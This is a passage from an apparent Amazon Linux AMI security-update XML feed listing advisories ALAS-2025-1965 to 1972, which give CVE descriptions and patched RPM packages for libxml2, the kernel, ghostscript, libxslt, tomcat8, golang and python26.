status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1965</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1965: important priority package update for libxml2</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24928:
libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a stack-based buffer overflow in xmlSnprintfElements in valid.c. To exploit this, DTD validation must occur for an untrusted document or untrusted DTD. NOTE: this is similar to CVE-2017-9047.
CVE-2024-56171:
libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a use-after-free in xmlSchemaIDCFillNodeTables and xmlSchemaBubbleIDCNodeTables in xmlschemas.c. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56171" title="" id="CVE-2024-56171" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24928" title="" id="CVE-2025-24928" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-debuginfo" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1966</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1966: important priority package update for kernel</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21702:
In the Linux kernel, the following vulnerability has been resolved:
pfifo_tail_enqueue: Drop new packet when sch->limit == 0
CVE-2024-53179:
In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix use-after-free of signing key
CVE-2024-49960:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix timer use-after-free on failed mount
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49960" title="" id="CVE-2024-49960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53179" title="" id="CVE-2024-53179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21702" title="" id="CVE-2025-21702" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.603.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1967</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1967: important priority package update for ghostscript</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-27836:
Potential print buffer overflow. Fixed in ghostpdl-10.05.0 by implementing stricter buffer length validation.
Info: https://bugs.ghostscript.com/show_bug.cgi?id=708192
Patch: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=8b6d19b2b4079da6863ef25f2370f25d4b054919 (ghostpdl-10.05.0)
CVE-2025-27832:
The calculation of the buffer size was being done with int values, and overflowing that data type. The bug has existed since the creation of the file contrib/japanese/gdevnpdl.c
The calculation of the buffer size was being done with int values, and overflowing that data type. By leaving the total size calculation to the memory manager, the calculation ends up being done in size_t values, and avoiding the overflow in this case, but also meaning the memory manager overflow protection will be effective.
Fixed in ghostpdl-10.05.0
Info: https://bugs.ghostscript.com/show_bug.cgi?id=708133
Patch: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=57291c846334f1585552010faa42d7cb2cbd5c41
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27832" title="" id="CVE-2025-27832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27836" title="" id="CVE-2025-27836" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1968</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1968: important priority package update for libxslt</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24855:
numbers.c in libxslt before 1.1.43 has a use-after-free because, in nested XPath evaluations, an XPath context node can be modified but never restored. This is related to xsltNumberFormatGetValue, xsltEvalXPathPredicate, xsltEvalXPathStringNs, and xsltComputeSortResultInternal.
CVE-2024-55549:
xsltGetInheritedNsList in libxslt before 1.1.43 has a use-after-free issue related to exclusion of result prefixes.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55549" title="" id="CVE-2024-55549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24855" title="" id="CVE-2025-24855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt-debuginfo" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python27-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-6.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1969</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1969: important priority package update for tomcat8</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24813:
Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.
If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads
- attacker knowledge of the names of security sensitive files being uploaded
- the security sensitive files also being uploaded via partial PUT
If all of the following were true, a malicious user was able to perform remote code execution:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- application was using Tomcat's file based session persistence with the default storage location
- application included a library that may be leveraged in a deserialization attack
Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
More justification and the patch links are available for all versions here:
[1] https://tomcat.apache.org/security-11.html
[2] https://tomcat.apache.org/security-10.html
[3] https://tomcat.apache.org/security-9.html
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24813" title="" id="CVE-2025-24813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.99-1.98.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1970</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1970: important priority package update for kernel</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21764:
In the Linux kernel, the following vulnerability has been resolved:
ndisc: use RCU protection in ndisc_alloc_skb()
CVE-2025-21762:
In the Linux kernel, the following vulnerability has been resolved:
arp: use RCU protection in arp_xmit()
CVE-2025-21760:
In the Linux kernel, the following vulnerability has been resolved:
ndisc: extend RCU protection in ndisc_send_skb()
CVE-2025-21753:
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix use-after-free when attempting to join an aborted transaction
CVE-2025-21731:
In the Linux kernel, the following vulnerability has been resolved:
nbd: don't allow reconnect after disconnect
CVE-2024-57979:
In the Linux kernel, the following vulnerability has been resolved:
pps: Fix a use-after-free
CVE-2024-56658:
In the Linux kernel, the following vulnerability has been resolved:
net: defer final 'struct net' free in netns dismantle
CVE-2024-56650:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: x_tables: fix LED ID check in led_tg_check()
CVE-2024-53103:
In the Linux kernel, the following vulnerability has been resolved:
hv_sock: Initializing vsk->trans to NULL to prevent a dangling pointer
CVE-2024-53057:
In the Linux kernel, the following vulnerability has been resolved:
net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT
CVE-2024-50033:
In the Linux kernel, the following vulnerability has been resolved:
slip: make slhc_remember() more robust against malicious packets
CVE-2024-49883:
In the Linux kernel, the following vulnerability has been resolved:
ext4: aovid use-after-free in ext4_ext_insert_extent()
CVE-2022-49720:
In the Linux kernel, the following vulnerability has been resolved:
block: Fix handling of offline queues in blk_mq_alloc_request_hctx()
CVE-2022-49390:
In the Linux kernel, the following vulnerability has been resolved:
macsec: fix UAF bug for real_dev
CVE-2022-49179:
In the Linux kernel, the following vulnerability has been resolved:
block, bfq: don't move oom_bfqq
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49179" title="" id="CVE-2022-49179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49390" title="" id="CVE-2022-49390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49720" title="" id="CVE-2022-49720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49883" title="" id="CVE-2024-49883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50033" title="" id="CVE-2024-50033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53057" title="" id="CVE-2024-53057" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53103" title="" id="CVE-2024-53103" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56650" title="" id="CVE-2024-56650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56658" title="" id="CVE-2024-56658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57979" title="" id="CVE-2024-57979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21731" title="" id="CVE-2025-21731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21753" title="" id="CVE-2025-21753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21760" title="" id="CVE-2025-21760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21762" title="" id="CVE-2025-21762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21764" title="" id="CVE-2025-21764" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.618.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1971</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1971: important priority package update for golang</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-34156:
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34156" title="" id="CVE-2024-34156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.23.7-1.50.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.23.7-1.50.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.23.7-1.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1972</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1972: medium priority package update for python26</title><issued date="2025-04-23 21:11:00" /><updated date="2025-04-29 21:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
CVE-2019-18348:
A CRLF injection flaw was discovered in python in the way URLs are handled when doing an HTTP/HTTPS connection (e.g. through urlopen() or HTTPConnection). An attacker who can control the url parameter passed to urlopen method in the urllib/urllib2 modules can inject CRLF sequences and HTTP headers by abusing the "host" part of the URL.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" 